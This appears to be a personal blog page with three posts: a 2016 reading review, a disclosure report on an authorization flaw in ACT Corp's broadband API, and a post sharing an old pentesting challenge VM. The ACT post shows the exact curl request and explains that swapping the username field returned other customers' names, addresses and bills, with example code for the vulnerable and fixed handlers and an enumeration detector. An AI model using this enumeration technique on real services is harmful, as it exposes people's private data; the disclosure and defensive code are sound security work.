Abhay Rana aka Nemo

Book Review (2016)

I tweeted this a while back about my reading progress in 2016, and thought I’d do a post about what I read.

Continuing with the review tradition from last year, here are the top 3 books that I read in 2016:

Other books that I enjoyed were “Bands of Mourning”, the 3rd book in Mistborn Era 2, and the Powder Mage Trilogy which I found hard to put down.

I decided to aim for 36 books in 2016 (as well as 2017 now), and crossed that nicely. I picked 36 because it corresponds to 3 books a month or 1 book every 10 days, which makes for a goal that is easily tracked. I count everything that Goodreads might count as a book (which is both good and bad), but I stick to it. Far more important for me would be the page count, which I charted at the end of the year: I read ~830 pages a month, which I’m pretty happy with.

I’m hoping to read more technical books in 2017, and have made some progress on that front with re-reading SICP.

If you are interested in the script that generated the graph, you can find it on GitHub.

Vulnerability Report: ACT Corp

ACT, for those who don’t know, is one of India’s most popular broadband providers.

This is a very brief and concise summary.

  • ACT has a mobile application
  • That allows you to login and check your plan details, data usage etc.
  • I’ve been wanting to build a command line application that lets me check the balance easily
  • I tried scripting their website, but it was too much JavaScript.
  • The mobile app uses an API to do the same
  • The API happens to have really bad auth
  • Got fixed almost 3 months after reporting this.

Request

curl https://myfibernet.actcorp.in/api/user/plandetails \
  -H "Content-Type: application/json" \
  -H "Authtoken: 2aee21dfb1ef77707c30f48ccc513ad60b74d1fc6a84d60ecc32323ab5941469" \
  -H "Apiversion: 1.0" \
  -H "Appversion: 32" \
  -H "Devicetype: 1" \
  -H "Deviceid: 68590327e3e0ca81" \
  -H "Mobilenumber: 9999999999" \
  -H "Mid: 8973808103928d98703e65c0106b7a9d4001886234afbc2d7ce6415b75f9c216" \
  --data '{"username":"11111111"}'

The API responds back with the following:

{
  "code": 200,
  "status": true,
  "message": "Success",
  "data": {
    "plan_details": {
      "agreement_info": {
        "agreement_no": "XXXXXXXXXX",
        "promotion_code": "",
        "package_code": "ACTESS01M",
        "package_name": "",
        "agreement_startdate": "DD/MM/YYYY",
        "expiry_date": "",
        "status": "",
        "entity_code": "[]",
        "subscription_period": "[]",
        "payterm": "[]",
        "billingcycle_code": "[]",
        "contract_type": "ISP",
        "outlets": "1",
        "service_points": "",
        "package_tenure": int,
        "due_date": ""
      },
      "product_info": {
        "product_code": "",
        "product_desc": ""
      }
    },
    "plan_usage_info": {
      "service_id": "ACTESS01M",
      "service_name": "ACTESS01M",
      "outbyteslimit": 322122547200,
      "outbytesremaining": 153400581140,
      "outbytesused": 168721966060
    },
    "bill_info": {
      "accountno": "111111112233",
      "subscribername": "NAME",
      "phonenumber": "PHONENUMBER",
      "address": {
        "line1": "YUP",
        "line2": "THESE TWO LINES WERE FILLED",
        "line3": "",
        "district": "AND THIS",
        "city": "BANGALORE",
        "state": "KARNATAKA",
        "country": "India"
      },
      "billno": "10000001111",
      "billdate": "DD/MM/2016",
      "account_period": "01/MM/2016-30/MM/2016",
      "previous_due": "",
      "current_invoice_amt": "1234",
      "total_due": "0",
      "bill_due_date": "15 Nov 2016"
    }
  }
}

Some of these fields are empty, and values that I didn’t understand I’ve replaced with [].

The fun part is that the request is actually a POST and contains the following data:

{"username":"11111111"}

I happen to have friends who also use ACT. I asked around for usernames, and just by changing this one parameter in the request, I could access the complete details of almost everyone else.

Almost everyone, because for certain accounts I get a valid empty response. Valid because it has the same schema, but empty because all values are empty strings. I don’t know why that happens consistently only for certain accounts. (One of these was a Hyd account, the other in BLR.)
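The bug above is an authorization failure: a valid Authtoken is checked, but the record returned is whatever username the client puts in the body. The following is an added example, not ACT’s code; it models a vulnerable plandetails handler beside a fixed one that binds the lookup to the token’s owner, and adds a log check for the abuse pattern. Tokens, account records and log lines are all constructed.

```python
from collections import defaultdict

# Constructed: which account each Authtoken was issued for.
TOKENS = {"tok-alice": "11111111", "tok-bob": "22222222"}
# Constructed: account records, trimmed to two fields from the response shown.
ACCOUNTS = {
    "11111111": {"subscribername": "ALICE", "outbytesused": 168721966060},
    "22222222": {"subscribername": "BOB", "outbytesused": 1024},
}
EMPTY = {"subscribername": "", "outbytesused": ""}


def vulnerable_plandetails(headers, body):
    """Mirrors the reported behaviour: the token only has to be valid, and
    the record returned is whichever username the client put in the body."""
    if headers.get("Authtoken") not in TOKENS:
        return {"code": 401, "status": False, "data": None}
    record = ACCOUNTS.get(body.get("username"))
    # Unknown username: same schema, empty values (a constructed stand-in for
    # the empty responses described in the post; the real cause is unknown).
    return {"code": 200, "status": True, "data": record or EMPTY}


def fixed_plandetails(headers, body):
    """The account is derived from the token, never from the body. A body
    naming any other account is refused instead of being looked up."""
    owner = TOKENS.get(headers.get("Authtoken"))
    if owner is None:
        return {"code": 401, "status": False, "data": None}
    if body.get("username", owner) != owner:
        return {"code": 403, "status": False, "data": None}
    return {"code": 200, "status": True, "data": ACCOUNTS[owner]}


def tokens_reading_many_accounts(log_lines, threshold=3):
    """Detection: one Authtoken fetching plandetails for many distinct
    usernames is the signature of this enumeration. The log format is
    constructed as '<token> <username>' per request."""
    seen = defaultdict(set)
    for line in log_lines:
        token, username = line.split()
        seen[token].add(username)
    return sorted(t for t, users in seen.items() if len(users) >= threshold)


if __name__ == "__main__":
    hdr = {"Authtoken": "tok-alice"}
    print(vulnerable_plandetails(hdr, {"username": "22222222"})["data"])  # BOB's record
    print(fixed_plandetails(hdr, {"username": "22222222"})["code"])  # 403
```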

If you are interested I’m working on a simple API that lets you access the ACT API to check the same details. It would ask you for an OTP the first time you login, and then cache the credentials to let you check the balance easily.

I reported this to ACT as soon as I found it. Will disclose after I’ve given them some time!

Update: This was reported and fixed by ACT after I managed to find a contact via an investor (really!).

Timeline

Date         Details
-----------  -------
29 Nov 2016  Vulnerability identified
29 Nov 2016  Email sent to ACT, no response
6 Dec 2016   Email sent with partial customer details to explain the scope of the issue, no response
8 Dec 2016   Reminder sent, no response
20 Jan 2017  Another reminder with a writeup sent. I also set a deadline of 29th January (2 months since first contact). Also got in touch with CERT-IN. No response
23 Jan 2017  An investor in ACT happened to see my tweet and responded over Twitter. Sent a writeup, along with the suggestion to take down the application
24 Jan 2017  ACT reports the issue is fixed. I test and report back as fixed the next day
26 Mar 2017  Report published

However, the long timeline involved here pretty much guarantees that if you are an ACT customer, your data is out there in public.

CCTC Challenge VM

This is specifically about the contest held in 2011, 6 years ago. I’ve written about my experience during the contest on this blog.

More specifically, Round 2 of the contest was a pentesting scenario where we were only provided with a VM image and asked to test it and report any vulnerabilities that we found.

I recently found the VirtualBox images, and thought I’d share them as an easy intro to web security.

Instructions

  1. Get the VMWare image from https://atlantis.captnemo.in/cctc/
  2. Hack.
  3. Credentials are student:student (username:password)
  4. Open /cctc in your browser.

Rules

  1. Only the application and its serving components can be tested for vulnerabilities. The serving components include:
    • Webserver
    • Operating System
    • Any other services/files in the guest machine and guest operating system
  2. Any vulnerability identified in any component outside the above mentioned ones will not be used for evaluation
  3. All participants should necessarily submit all the exploit codes/custom scripts written to identify the vulnerabilities in the system.
  4. The deadline for the original challenge was 2 weeks, but you’re free to take as much time as you want. Feel free to publish a list of vulnerabilities you find.

The attached spreadsheet provides the format of the report, the challenges in scope, and the details to be filled out for each vulnerability identified.

The tasks to be performed are mentioned in the report. Each task consists of the following sections:

  1. Vulnerability/Vulnerabilities – You need to write the description of the vulnerability
  2. Root Cause(s) – What is the root cause of the vulnerability?
  3. Approach adopted (Steps with screenshots) – Write the steps followed to exploit the vulnerability along with a screenshot of the final screen and/or intermediate steps.
  4. Remediation with sample code snippet – Write the remediation steps to address this vulnerability. Also, write the sample code if applicable.

Also attached is a step by step installation guide for application set-up.

A few points to be considered:

  • Challenges can be attempted and completed in any order.
  • Only the application and its serving components can be tested for vulnerabilities. All other components like VMware, if tested for security issues, would lead to disqualification.
  • I will not be responsible for the discovery/notification of any zero day vulnerability in any software. If any zero-day vulnerability is identified, it is the responsibility of the concerned participant to notify the vulnerability to the respective vendor as per vendor’s policy.

If you are really interested, you can find a copy of the report we submitted at /reports/cctc.

Thanks to Harshil and Shobhit for working alongside on this.